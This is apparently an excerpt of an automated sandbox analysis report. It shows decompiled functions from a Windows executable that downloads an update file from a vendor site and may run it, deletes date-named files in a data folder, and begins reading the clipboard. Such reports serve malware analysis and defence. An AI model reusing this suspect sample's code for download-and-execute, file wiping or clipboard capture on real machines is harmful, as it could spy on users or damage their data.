#924.MFC42(?,004558C4,00448FA4,\*.), ref: 004247FF
#922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042480E
#800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042481A
#800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424826
#3811.MFC42(?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042484A
FindFirstFileA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424860
sscanf.MSVCRT ref: 0042489C
sscanf.MSVCRT ref: 004248CA
#551.MFC42(?,?,?,?,?,00000000,000000FF), ref: 004248EE
#536.MFC42(0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424911
#924.MFC42(?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424922
#922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?,?,00000000,000000FF), ref: 00424931
#924.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 00424946
#800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 00424952
#800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 0042495E
#800.MFC42(?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?,?), ref: 0042496A
DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,?,?,?,?), ref: 00424972
#800.MFC42(?,?,?,?,?,?,00000000,000000FF), ref: 0042497F
FindNextFileA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042498E
FindClose.KERNEL32(?,?,?,?,?,?,?,00000000,000000FF), ref: 0042499F
#800.MFC42(?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 004249AC

Strings

th_%d-%d-%d_%d-%d-%d, xrefs: 004248C4
|(D, xrefs: 004247C9
%d-%d-%d_%d-%d-%d, xrefs: 00424896
\*., xrefs: 004247DC

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#924FileFind$#922sscanf$#3811#536#537#551CloseDeleteFirstH_prologNext
String ID: %d-%d-%d_%d-%d-%d$\*.$th_%d-%d-%d_%d-%d-%d$|(D
API String ID: 2474383201-3394397131
Opcode ID: d8c2269e1878d58c2d70a80da3360a4c75bec990216e80994967739dc6c72962
Instruction ID: a318d721161369913f553a0bcd1c46d3b64b96353087be9969273a486939b92b
Opcode Fuzzy Hash: d8c2269e1878d58c2d70a80da3360a4c75bec990216e80994967739dc6c72962
Instruction Fuzzy Hash: 36515C72D0014CAADF11EBE5DD85EDFBBBCAF19304F10416AF505A7181EB38AA49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042221F, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 124
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0042221F(void* __ecx) {
				void* _t34;
				intOrPtr* _t36;
				intOrPtr _t37;
				int _t43;
				int _t47;
				void* _t72;
				void* _t73;

				E0043E4E0(0x44239c, _t73);
				_push("update.tmp");
				_push(0x4558c8);
				_push(_t73 - 0x14);
				L0043DE20();
				 *(_t73 - 4) = 0;
				_t34 = E0042900A(__ecx);
				if(_t34 == 0) {
					L9:
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					L0043DD36();
					_push(1);
					_pop(0);
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
					return 0;
				}
				_push("updates/bpk.dat");
				L0043DE26();
				_push("http://www.blazingtools.com/");
				 *(_t73 - 4) = 1;
				L0043DE26();
				_push(_t34);
				_push(_t34);
				_t36 = _t73 - 0x1c;
				 *(_t73 - 4) = 2;
				_push(_t36);
				L0043E282();
				_t37 =  *_t36;
				_push(0);
				_push(0);
				_push( *(_t73 - 0x14));
				_push(_t37);
				_push(0);
				L0043E988();
				 *((char*)(_t73 - 0xd)) = _t37 >= 0;
				L0043DD36();
				 *(_t73 - 4) = 1;
				L0043DD36();
				 *(_t73 - 4) = 0;
				L0043DD36();
				if( *((intOrPtr*)(_t73 - 0xd)) == 0) {
					goto L9;
				}
				memset(_t73 - 0x1c, 0, 5);
				_t72 = CreateFileA( *(_t73 - 0x14), 0x80000000, 1, 0, 3, 0, 0);
				if(_t72 == 0xffffffff) {
					L5:
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					L0043DD36();
					goto L10;
				}
				_t43 = ReadFile(_t72, _t73 - 0x1c, 4, _t73 - 0x20, 0);
				_push(_t72);
				if(_t43 != 0) {
					CloseHandle();
					DeleteFileA( *(_t73 - 0x14));
					_t47 = atoi(_t73 - 0x1c);
					if(_t47 > 0x692) {
						_push(0xffffffff);
						_push(0x24);
						_push(0xe050);
						L0043E2CA();
						if(_t47 == 6) {
							ShellExecuteA(0, "open",  *(E00429029(_t73 - 0x24, 0xe069)), 0, 0, 0);
							L0043DD36();
						}
					}
					goto L9;
				} else {
					CloseHandle();
					goto L5;
				}
			}

0x00422224
0x0042222e
0x00422236
0x0042223b
0x0042223c
0x00422243
0x00422246
0x0042224d
0x00422374
0x00422374
0x0042237b
0x00422380
0x00422382
0x00422383
0x00422388
0x00422390
0x00422390
0x00422253
0x0042225b
0x00422262
0x0042226a
0x0042226e
0x00422273
0x00422274
0x00422275
0x00422278
0x0042227c
0x0042227d
0x00422282
0x00422284
0x00422285
0x00422286
0x00422289
0x0042228a
0x0042228b
0x00422295
0x00422299
0x004222a1
0x004222a5
0x004222ad
0x004222b0
0x004222b8
0x00000000
0x00000000
0x004222c5
0x004222e2
0x004222e7
0x00422306
0x00422306
0x0042230d
0x00000000
0x00422312
0x004222f5
0x004222fd
0x004222fe
0x00422316
0x0042231f
0x00422329
0x00422335
0x00422337
0x00422339
0x0042233b
0x00422340
0x00422348
0x00422366
0x0042236f
0x0042236f
0x00422348
0x00000000
0x00422300
0x00422300
0x00000000
0x00422300

APIs

__EH_prolog.LIBCMT ref: 00422224
#924.MFC42(?,004558C8,update.tmp), ref: 0042223C

Part of subcall function 0042900A: InternetGetConnectedState.WININET(?,00000000), ref: 0042901B

#537.MFC42(updates/bpk.dat,?,004558C8,update.tmp), ref: 0042225B
#537.MFC42(http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 0042226E
#922.MFC42(?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 0042227D
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0042228B
#800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 00422299
#800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 004222A5
#800.MFC42(?,?,00000000,00000000,http://www.blazingtools.com/,updates/bpk.dat,?,004558C8,update.tmp), ref: 004222B0
memset.MSVCRT ref: 004222C5
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,update.tmp), ref: 004222DC
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004222F5
CloseHandle.KERNEL32(00000000), ref: 00422300
#800.MFC42 ref: 0042230D
CloseHandle.KERNEL32(00000000), ref: 00422316
DeleteFileA.KERNEL32(?), ref: 0042231F
atoi.MSVCRT ref: 00422329
#1199.MFC42(0000E050,00000024,000000FF), ref: 00422340
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00422366
#800.MFC42 ref: 0042236F
#800.MFC42(?,004558C8,update.tmp), ref: 0042237B

Strings

open, xrefs: 00422360
http://www.blazingtools.com/, xrefs: 00422262
updates/bpk.dat, xrefs: 00422253
update.tmp, xrefs: 0042222E

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$File$#537CloseHandle$#1199#922#924ConnectedCreateDeleteDownloadExecuteH_prologInternetReadShellStateatoimemset
String ID: http://www.blazingtools.com/$open$update.tmp$updates/bpk.dat
API String ID: 2648343705-1752780610
Opcode ID: 4363ea708f6925a2d96f7f53b07cf424017c3dda2a89f8108f7c52464c5e5b6a
Instruction ID: 733a3dbabded4b3e3ac0688eea2b88af01605287e532e2a53e4c3f2536567161
Opcode Fuzzy Hash: 4363ea708f6925a2d96f7f53b07cf424017c3dda2a89f8108f7c52464c5e5b6a
Instruction Fuzzy Hash: EB41AE71D00209BEEB10EBB1DD86EEF77BCEB19358F50056AF511B21D1DA7C4E048A29

Uniqueness

Uniqueness Score: -1.00%

Function 004251F0, Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 110
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004251F0() {
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t51;
				void* _t52;
				void* _t53;
				CHAR** _t54;
				void* _t61;
				void* _t77;
				void* _t82;

				_t44 = E0043E4E0(0x442964, _t82);
				_push(1);
				_push(0x5c);
				L0043E34E();
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				_t77 = "dt";
				_push(_t77);
				_t45 = _t82 - 0x1c;
				_push(0x4558c4);
				_push(_t45);
				L0043DE20();
				_push(_t44);
				_push(_t45);
				_t46 = _t82 - 0x34;
				 *(_t82 - 4) = 1;
				_push(_t46);
				L0043E282();
				_push("*.");
				_push(_t46);
				 *(_t82 - 4) = 2;
				_push(_t82 - 0x10);
				L0043DE20();
				 *(_t82 - 4) = 6;
				L0043DD36();
				 *(_t82 - 4) = 5;
				L0043DD36();
				 *(_t82 - 4) = 4;
				L0043DD36();
				_t61 = FindFirstFileA( *(_t82 - 0x10), _t82 - 0x174);
				if(_t61 != 0xffffffff) {
					do {
						_t51 = _t82 - 0x148;
						_push(_t51);
						L0043DE26();
						 *((intOrPtr*)(_t82 - 0x24)) = _t51;
						_push(_t77);
						 *(_t82 - 4) = 7;
						L0043DE26();
						_push(_t51);
						_t52 = _t82 - 0x20;
						_push(0x4558c4);
						_push(_t52);
						 *(_t82 - 4) = 8;
						L0043E282();
						_push(0x5c);
						_push(_t52);
						_t53 = _t82 - 0x18;
						 *(_t82 - 4) = 9;
						_push(_t53);
						L0043E14A();
						_push( *((intOrPtr*)(_t82 - 0x24)));
						 *(_t82 - 4) = 0xa;
						_push(_t53);
						_t54 = _t82 - 0x14;
						_push(_t54);
						L0043E282();
						DeleteFileA( *_t54);
						L0043DD36();
						 *(_t82 - 4) = 9;
						L0043DD36();
						 *(_t82 - 4) = 8;
						L0043DD36();
						 *(_t82 - 4) = 7;
						L0043DD36();
						 *(_t82 - 4) = 4;
						L0043DD36();
					} while (FindNextFileA(_t61, _t82 - 0x174) != 0);
					FindClose(_t61);
				}
				 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
				L0043DD36();
				_t50 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
				return _t50;
			}

0x004251f5
0x00425203
0x00425205
0x0042520a
0x00425211
0x00425215
0x0042521f
0x00425220
0x00425223
0x00425224
0x00425225
0x0042522a
0x0042522b
0x0042522c
0x0042522f
0x00425233
0x00425234
0x00425239
0x0042523e
0x00425242
0x00425246
0x00425247
0x0042524f
0x00425253
0x0042525b
0x0042525f
0x00425267
0x0042526b
0x00425280
0x00425285
0x0042528b
0x0042528b
0x00425294
0x00425295
0x0042529a
0x0042529d
0x004252a1
0x004252a5
0x004252aa
0x004252ab
0x004252ae
0x004252af
0x004252b0
0x004252b4
0x004252b9
0x004252bb
0x004252bc
0x004252bf
0x004252c3
0x004252c4
0x004252c9
0x004252cc
0x004252d0
0x004252d1
0x004252d4
0x004252d5
0x004252dc
0x004252e5
0x004252ed
0x004252f1
0x004252f9
0x004252fd
0x00425305
0x00425309
0x00425311
0x00425315
0x00425328
0x00425331
0x00425331
0x00425337
0x0042533e
0x00425348
0x0042534c
0x00425354

APIs

__EH_prolog.LIBCMT ref: 004251F5
#536.MFC42(0000005C,00000001,00000000,00000000,00000001), ref: 0042520A
#924.MFC42(?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425225
#922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425234
#924.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425247
#800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425253
#800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042525F
#800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042526B
FindFirstFileA.KERNEL32(?,?,?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042527A
#537.MFC42(?), ref: 00425295
#537.MFC42(00448FA4,?), ref: 004252A5
#922.MFC42(?,004558C4,00000000,00448FA4,?), ref: 004252B4
#923.MFC42(?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252C4
#922.MFC42(?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252D5
DeleteFileA.KERNEL32(00000000,?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252DC
#800.MFC42 ref: 004252E5
#800.MFC42 ref: 004252F1
#800.MFC42 ref: 004252FD
#800.MFC42 ref: 00425309
#800.MFC42 ref: 00425315
FindNextFileA.KERNEL32(00000000,?), ref: 00425322
FindClose.KERNEL32(00000000), ref: 00425331
#800.MFC42 ref: 0042533E

Strings

d)D, xrefs: 004251F0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#922FileFind$#537#924$#536#923CloseDeleteFirstH_prologNext
String ID: d)D
API String ID: 2521672067-2238226572
Opcode ID: cb994cff8f3a3cd7863efcd7bb46c5e076a6407cc83e4536a2f4cf281a9361fc
Instruction ID: 31c07cfcbb4a6913db587de62b8c9b9804f8fda3cf17b0e80b2017485f3751c5
Opcode Fuzzy Hash: cb994cff8f3a3cd7863efcd7bb46c5e076a6407cc83e4536a2f4cf281a9361fc
Instruction Fuzzy Hash: C5418D71C01289EADB50EBE5D949BDEBBB8AF19318F10459AF405B3182DB7C1B08CA35

Uniqueness

Uniqueness Score: -1.00%

Function 004255B0, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 163
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004255B0(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t66;
				void* _t67;
				int _t70;
				int _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t119;
				intOrPtr _t122;
				void* _t130;
				void* _t132;
				intOrPtr* _t133;

				_t119 = __edx;
				_t66 = E0043E4E0(0x4429c0, _t130);
				_t133 = _t132 - 0x180;
				_push("\\*.");
				L0043DE26();
				_push("dt");
				_t67 = _t130 - 0x34;
				_push(0x4558c4);
				_push(_t67);
				 *(_t130 - 4) = 0;
				L0043DE20();
				_push(_t66);
				_push(_t67);
				 *(_t130 - 4) = 1;
				_push(_t130 - 0x10);
				L0043E282();
				 *(_t130 - 4) = 4;
				L0043DD36();
				 *(_t130 - 4) = 3;
				L0043DD36();
				_t70 = FindFirstFileA( *(_t130 - 0x10), _t130 - 0x18c);
				 *(_t130 - 0x28) = _t70;
				if(_t70 == 0xffffffff) {
					L9:
					 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
					L0043DD36();
					 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
					return _t70;
				} else {
					goto L1;
				}
				do {
					L1:
					_t78 = sscanf(_t130 - 0x160, "%d-%d-%d_%d-%d-%d", _t130 - 0x20, _t130 - 0x18, _t130 - 0x14, _t130 - 0x2c, _t130 - 0x1c, _t130 - 0x30);
					_t122 =  *((intOrPtr*)(_t130 + 8));
					_t133 = _t133 + 0x20;
					if(_t78 == 6) {
						L5:
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t130 - 0x30)));
						_push( *((intOrPtr*)(_t130 - 0x1c)));
						_push( *((intOrPtr*)(_t130 - 0x2c)));
						_push( *((intOrPtr*)(_t130 - 0x14)));
						_push( *((intOrPtr*)(_t130 - 0x18)));
						_push( *((intOrPtr*)(_t130 - 0x20)));
						L0043E49E();
						_push(0);
						L0043E288();
						_t79 =  *_t78;
						_push(0);
						 *((intOrPtr*)(_t130 - 0x3c)) = _t79;
						L0043E288();
						_t80 =  *((intOrPtr*)(_t79 + 4));
						_push(0);
						 *((intOrPtr*)(_t130 - 0x4c)) = _t80;
						L0043E288();
						_t81 =  *((intOrPtr*)(_t80 + 8));
						_push(0);
						 *((intOrPtr*)(_t130 - 0x44)) = _t81;
						L0043E288();
						_t82 =  *((intOrPtr*)(_t81 + 0xc));
						_push(0);
						 *((intOrPtr*)(_t130 - 0x24)) = _t82;
						L0043E288();
						_push(0);
						L0043E288();
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t130 - 0x3c)));
						_push( *((intOrPtr*)(_t130 - 0x4c)));
						_push( *((intOrPtr*)(_t130 - 0x44)));
						_push( *((intOrPtr*)(_t130 - 0x24)));
						_push( *((intOrPtr*)(_t82 + 0x10)) + 1);
						_push( *((intOrPtr*)(_t82 + 0x14)) + 0x76c);
						L0043E49E();
						_push(_t130 - 0x40);
						 *((intOrPtr*)(_t130 - 0x24)) = _t133;
						 *_t133 =  *((intOrPtr*)(_t130 - 0x40));
						if(L0042387B(_t133, 0, _t119, _t122 + 0x120,  *((intOrPtr*)(_t82 + 0x10)) + 1) != 0) {
							E004283A6( *((intOrPtr*)(_t130 + 0xc)), _t130 - 0x160);
							 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x10)))) +  *((intOrPtr*)(_t130 - 0x16c));
						}
						goto L7;
					}
					if( *((intOrPtr*)(_t122 + 0x140)) == 0 &&  *((intOrPtr*)(_t122 + 0x14f)) == 0) {
						_t78 = sscanf(_t130 - 0x160, "th_%d-%d-%d_%d-%d-%d", _t130 - 0x20, _t130 - 0x18, _t130 - 0x14, _t130 - 0x2c, _t130 - 0x1c, _t130 - 0x30);
						_t133 = _t133 + 0x20;
						if(_t78 != 6) {
							goto L7;
						}
						goto L5;
					}
					L7:
				} while (FindNextFileA( *(_t130 - 0x28), _t130 - 0x18c) != 0);
				_t70 = FindClose( *(_t130 - 0x28));
				goto L9;
			}

0x004255b0
0x004255b5
0x004255ba
0x004255c3
0x004255cb
0x004255d2
0x004255d7
0x004255dc
0x004255e1
0x004255e2
0x004255e5
0x004255ea
0x004255eb
0x004255ef
0x004255f3
0x004255f4
0x004255fc
0x00425600
0x00425608
0x0042560c
0x0042561b
0x00425624
0x00425627
0x0042578d
0x0042578d
0x00425794
0x0042579e
0x004257a7
0x00000000
0x00000000
0x00000000
0x0042562d
0x0042562d
0x00425657
0x00425659
0x0042565c
0x00425662
0x004256ae
0x004256ae
0x004256b3
0x004256b6
0x004256b9
0x004256bc
0x004256bf
0x004256c2
0x004256c5
0x004256d0
0x004256d3
0x004256d8
0x004256da
0x004256dd
0x004256e0
0x004256e5
0x004256e8
0x004256eb
0x004256ee
0x004256f3
0x004256f6
0x004256f9
0x004256fc
0x00425701
0x00425704
0x00425707
0x0042570a
0x00425712
0x00425716
0x0042571b
0x00425720
0x0042572b
0x0042572e
0x00425731
0x00425734
0x00425735
0x00425736
0x0042573b
0x00425741
0x00425744
0x00425750
0x0042575c
0x0042576a
0x0042576a
0x00000000
0x00425750
0x0042566a
0x004256a0
0x004256a2
0x004256a8
0x00000000
0x00000000
0x00000000
0x004256a8
0x0042576c
0x0042577c
0x00425787
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004255B5
#537.MFC42(\*.), ref: 004255CB
#924.MFC42(?,004558C4,00448FA4,\*.), ref: 004255E5
#922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 004255F4
#800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00425600
#800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042560C
FindFirstFileA.KERNEL32(?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042561B
sscanf.MSVCRT ref: 00425657
sscanf.MSVCRT ref: 004256A0
#551.MFC42(?,?,?,?,?,?,000000FF), ref: 004256C5
#3337.MFC42(00000000,?,?,?,?,?,?,000000FF), ref: 004256D3
#3337.MFC42(00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256E0
#3337.MFC42(00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256EE
#3337.MFC42(00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 004256FC
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 0042570A
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000000FF), ref: 00425716
#551.MFC42(?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00425736
FindNextFileA.KERNEL32(?,?,?,?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00425776
FindClose.KERNEL32(?,?,?,?,?,?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00425787
#800.MFC42 ref: 00425794

Strings

th_%d-%d-%d_%d-%d-%d, xrefs: 0042569A
%d-%d-%d_%d-%d-%d, xrefs: 00425651
\*., xrefs: 004255C3

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3337$#800Find$#551Filesscanf$#537#922#924CloseFirstH_prologNext
String ID: %d-%d-%d_%d-%d-%d$\*.$th_%d-%d-%d_%d-%d-%d
API String ID: 660066806-1679331109
Opcode ID: bcc69f0be05de23c96552e96fae00e0952e03b1e0e1a53516dc19a9d2ce68e27
Instruction ID: 3d64c4aef729d216587f9b74db1c9f3144b95c8a1f342f67b1514801903e3a20
Opcode Fuzzy Hash: bcc69f0be05de23c96552e96fae00e0952e03b1e0e1a53516dc19a9d2ce68e27
Instruction Fuzzy Hash: C6515A72D00118ABCF15EBE5DC81DEEBBBDAF4C314F44416AF515B3291EB38AA058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00428E0F, Relevance: 22.6, APIs: 15, Instructions: 93
clipboardstringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00428E0F(struct HWND__* _a4, void* _a8) {
				void* _t12;
				char* _t17;
				short* _t24;
				char* _t31;
				struct HWND__* _t32;
				int _t34;

				_t32 = E00428BC9();
				if(IsWindow(_t32) != 0 && IsWindowUnicode(_t32) != 0) {
					_push(1);
					_pop(0);
				}
				if(IsClipboardFormatAvailable(0xd) != 0 && 0 != 0) {
					_push(1);
					_pop(0);
				}
				if(IsClipboardFormatAvailable(1) != 0 || 0 != 0) {
